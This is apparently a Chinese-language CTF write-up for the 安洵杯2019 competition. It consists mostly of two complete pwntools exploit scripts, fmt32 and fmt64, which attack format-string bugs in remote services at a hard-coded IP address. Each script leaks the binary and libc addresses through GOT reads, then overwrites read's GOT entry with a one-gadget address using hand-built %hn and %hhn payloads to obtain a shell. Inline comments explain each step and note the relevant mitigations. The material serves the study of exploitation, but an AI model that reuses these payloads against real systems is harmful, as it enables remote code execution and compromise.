安洵杯2019


fmt32

Format-string attack in three steps: leak the binary image, leak libc addresses through the GOT, then overwrite read's GOT entry.

from pwn import * 
import plus_fmt as pft
# Address range of the target's mapped image that binary_get() dumps.
# 0x8048000 is the conventional load base of a fixed-address (non-PIE) 32-bit
# ELF; the p32() packing below is what suggests a 32-bit target here.
start_addr=0x8048000
end_addr=0x804a000
# Single connection to the challenge service; every helper and the flat
# script below read from and write to this one global.
p=remote('47.108.135.45',10001)


def leak(addr):
    """Read the NUL-terminated bytes stored at ``addr`` via the format-string bug.

    The service echoes the user-supplied string back through printf, so the
    ``%10$s`` directive dereferences the 10th "argument" -- which this script
    assumes is the packed address appended at the end of the payload -- and
    prints whatever is stored there.

    Returns the leaked bytes with the terminating NUL re-appended, so callers
    can advance by ``len(data)``; a result of just ``'\\x00'`` means the byte
    at ``addr`` is zero.

    NOTE(review): Python 2-era pwntools script -- ``str`` and the value of
    ``p32()`` are concatenated directly, which only works when both are the
    same (byte-string) type.
    """
    p.recvuntil('Please tell me:')
    # 'OOOO' is a sentinel placed right after the directive: the echoed leak
    # ends where the marker begins.
    payload='%10$s'+'OOOO'+p32(addr)
    p.sendline(payload)
    p.recvuntil('Repeater:')
    data=p.recvuntil('OOOO',True)   # second arg is drop=True: strip the marker
    # printf's %s stops at (and never prints) the NUL, so put it back to keep
    # the dump byte-accurate and guarantee progress even on a zero byte.
    data+='\x00'
    return data

def binary_get():
    """Dump the target image from ``start_addr`` to ``end_addr`` using ``leak()``.

    Two output files are written: ``pwnelf`` receives the whole range, while
    ``pwnelf2`` is closed once the cursor passes ``start_addr + 0x500`` and so
    only holds the first ~0x500 bytes (presumably the ELF header region --
    the page does not say why a second copy is kept).

    NOTE(review): neither file is closed if ``leak()`` raises mid-dump (no
    ``with`` / ``finally``), and both are opened in text mode ``'w'`` although
    raw bytes are written -- fine on Python 2, wrong on Python 3.
    This helper is not called anywhere in the visible fmt32 script.
    """

    f=open('pwnelf','w')
    f2=open('pwnelf2','w')

    cur_addr = start_addr
    while cur_addr<=end_addr:
        data = leak(cur_addr)
        log.success('{} =>{}'.format(hex(cur_addr), repr(data)))
        # leak() always returns at least the re-appended NUL, so this advances.
        cur_addr += len(data)
        if f2.closed==False:
            f2.write(data)
        if cur_addr>start_addr+0x500:
            f2.close()
        f.write(data)
    f.close()

# GOT slot addresses of the target binary (presumably read off the dumped ELF
# from binary_get(); the page does not show the derivation).
# Defender note: this entire chain exists because the service passes
# user-controlled input as printf's format argument. Building with
# -Werror=format-security and Full RELRO (read-only GOT after startup) removes
# both the arbitrary read used below and the GOT overwrite that follows.
puts_got=0x804A01C
read_got=0x804A010
printf_got=0x804A014
stderr_got=0x804A040
# Leak the resolved libc address of puts from its GOT entry. Unlike leak(),
# this does not wait for 'Please tell me:' first and reads exactly 4 raw bytes.
payload='%10$s'+'OOOO'+p32(puts_got)
p.sendline(payload)
p.recvuntil('Repeater:')
puts_so=u32(p.recvn(4))
print(hex(puts_so))
# 0x5f140 / 0x3a80c / 0x03a940 are offsets in the remote libc build (puts,
# a one-gadget, system); the libc version they belong to is not stated here.
libc_base=puts_so-0x5f140
one=libc_base+0x3a80c
print(hex(libc_base))
system=0x03a940+libc_base   # computed but never used below

# Second leak (stderr's GOT slot); only logged, not used in the write.
payload='%10$s'+'OOOO'+p32(stderr_got)
p.sendline(payload)
p.recvuntil('Repeater:')
stderr_so=u32(p.recvn(4))
print(hex(stderr_so),hex(one))

log.success('one:%#x,stderr:%#x'%(one,stderr_so))


tag = {read_got:one} #printf->one
# ^ left over from the plus_fmt attempt (commented out below); unused.

# payload = pft. new_fmtstr_payload(8, tag, bits=32, write_size='short')
# #payload='%34819c%17$hn%28622c%18$hnaa\x10\xa0\x04\x08\x12\xa0\x04\x08'
# #one:0xf7de480c
# p.sendline(payload)

# Hand-built two-halfword (%hn) write of `one` into read_got / read_got+2.
# The -9 adjustments compensate for characters already counted before each
# %c group -- presumably the service's echo prefix; confirm against the binary.
low=one&0xffff
low-=9
high=one>>16
log.success('high:%#x,low:%#x'%(high,low))
str_low=str(low)
str_high=str(high)
offset=15   # stack-argument index assumed to hold the first appended address
payload=''
payload += '%'+str_low+'c%'+str(offset)+'$hn'
payload += '%'+str(high-low-9)+'c%'+str(offset+1)+'$hn'

# Pad so the two addresses appended next land on 4-byte stack slots
# (offset and offset+1); the '+1' in the formula is not explained on the page.
align=((4-len(payload)%4)+1)
payload+='a'*align
print(len(payload))

payload += p32(read_got)+p32(read_got+2)

p.sendline(payload)
# print(repr(payload))
# p.recvuntil('Repeater:')


# payload='%10$s'+'OOOO'+p32(stderr_got)
# p.sendline(payload)
# p.recvuntil('Repeater:')
# stderr_so=u32(p.recvn(4))
# print(hex(stderr_so),hex(one))



p.interactive()

fmt64

leak 速度很慢，所以利用题目给的 readelf -s fmt64 输出计算 ELF 的 read GOT 地址，再改写 GOT；pwntools 的 fmt 工具打不了，于是手写一个 fmt payload。

from pwn import * 
import plus_fmt as pft
# Single connection to the fmt64 service; shared by leak() and the flat script.
p=remote('47.108.135.45',20176)


# payload='%9$ppppp'+'a'*0x8
# p.sendline(payload)
# p.interactive()

# Range of the fixed-address 64-bit image that binary_get() would dump
# (0x400000 is the conventional non-PIE x86-64 load base).
start_addr=0x400000
end_addr=start_addr+0xf00
# Dump target for binary_get(). NOTE(review): opened at import time and only
# closed inside binary_get(), which is commented out below -- the handle is
# left open for the whole run, and text mode 'w' assumes Python 2 byte strings.
f=open('elf','w')

def leak(addr):
    """Read the NUL-terminated bytes stored at ``addr`` via the format-string bug.

    Same scheme as the 32-bit variant, but the address is packed with ``p64``
    and the directive is ``%9$s`` -- this script assumes the 9th stack
    "argument" is the address appended to the payload.

    Returns the leaked bytes with the terminating NUL re-appended so callers
    can advance by ``len(data)``.

    NOTE(review): Python 2-era code -- ``str`` and the ``p64()`` result are
    concatenated directly.
    """
    p.recvuntil('Please tell me:')
    # 'OOOO' marks where the leaked bytes end in the echoed output.
    payload='%9$s'+'OOOO'+p64(addr)
    p.sendline(payload)
    p.recvuntil('Repeater:')
    data=p.recvuntil('OOOO',True)   # drop=True strips the marker
    # %s never echoes the NUL it stopped at; restore it for a byte-accurate
    # dump and to guarantee progress on zero bytes.
    data+='\x00'
    return data


def binary_get():
    """Dump ``start_addr``..``end_addr`` through ``leak()`` into the global file ``f``.

    Uses the module-level handle ``f`` opened above and closes it when done.
    The call site is commented out in this script; per the write-up the leak
    was too slow, so the GOT layout was taken from ``readelf -s`` instead.

    NOTE(review): ``f`` is not closed if ``leak()`` raises mid-loop.
    """
    cur_addr = start_addr
    while cur_addr<=end_addr:
        data = leak(cur_addr)
        log.success('{} =>{}'.format(hex(cur_addr), repr(data)))
        # leak() returns at least the re-appended NUL, so this always advances.
        cur_addr += len(data)
        f.write(data)
    f.close()

#binary_get()

# GOT layout derived from the provided `readelf -s fmt64` output (see the
# write-up text); slot indices are 8 bytes apart. stderr_got and strlen_got
# are defined but unused in the final exploit.
# Defender note: the same mitigation applies as for fmt32 -- never pass
# user input as the format argument (-Werror=format-security) and link with
# Full RELRO so the GOT is read-only once the program starts.
got_base=0x601018
puts_got=got_base
read_got=got_base+6*8
stderr_got=0x6010a0
strlen_got=got_base+8


# Leak puts' resolved libc address from its GOT slot. Only 6 bytes are read
# because the top two bytes of a canonical x86-64 user-space pointer are zero;
# ljust pads them back before u64 unpacks.
p.recvuntil('Please tell me:')
payload='%9$s'+'OOOO'+p64(puts_got)
p.sendline(payload)
p.recvuntil('Repeater:')
puts_so=u64(p.recvn(6).ljust(8,'\x00'))
# 0x06f690 / 0xf1147 / 0x45390 are offsets in the remote libc build (puts,
# a one-gadget, system); the libc version is not stated on the page.
libc_base=puts_so-0x06f690
one=0xf1147+libc_base
system=libc_base+0x45390   # computed but unused below
log.success('libc_base ==> %#x,one ==> %#x'%(libc_base,one))

# [target address, value to write]
tag=[read_got,one]

# prew: characters printf has already emitted before the first %c group
# (starts at 9 -- presumably an echo prefix; confirm against the binary).
prew=9
by=[]
one2=one
offset=17   # stack-argument index assumed to hold the first appended address

#tag={stderr_got:one}
#payload = pft. new_fmtstr_payload(8, tag, numbwritten=0,bits=64, write_size='short')

# Split the 48-bit value into its six little-endian bytes.
for i in range(6):
    by.append(one2&0xff)
    one2>>=8
print(by)

payload = ''

# One %hhn per byte: each %<cnt>c pads the running count so that
# (chars printed so far) mod 256 equals the wanted byte, then the
# single-byte write lands at stack argument offset+i.
for i in range(6):
    payload += '%'
    cnt=(0x100+by[i]-(prew%0x100))%0x100
    payload +=str(cnt)
    payload+='c%'+str(offset+i)+'$hhn'
    prew+=cnt

# Pad to an 8-byte boundary so the appended addresses sit on whole stack slots.
payload += 'a'*(8-len(payload)%8)
log.success('payload ==> %s,%d'%(repr(payload),len(payload)))
# Bail out if the directives alone already fill 64 bytes -- presumably the
# addresses would then fall outside the slots offset=17.. assumes; the page
# does not state the input buffer size.
if(len(payload)==64):
    print('abort')
    exit(0)

# Six consecutive target byte addresses, one per %hhn above.
for i in range(6):
    payload+=p64(tag[0]+i)
log.success('payload ==> %s,%d'%(repr(payload),len(payload)))

# send(), not sendline(): no trailing newline is appended to the payload.
p.send(payload)


# p.recvuntil('Repeater:')

# payload='%9$s'+'OOOO'+p64(read_got)
# p.sendline(payload)
# p.recvuntil('Repeater:')
# stderr_so=u64(p.recvn(6).ljust(8,'\x00'))
# log.success('stderrgot ==> %#x',stderr_so)

p.interactive()


文章标题:安洵杯2019

本文作者:枫云李

发布时间:2019-11-30, 00:00:00

最后更新:2020-04-11, 01:24:25

原始链接:https://primelyw.github.io/2019/11/30/%E5%AE%89%E6%B4%B5%E6%9D%AF2019/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。
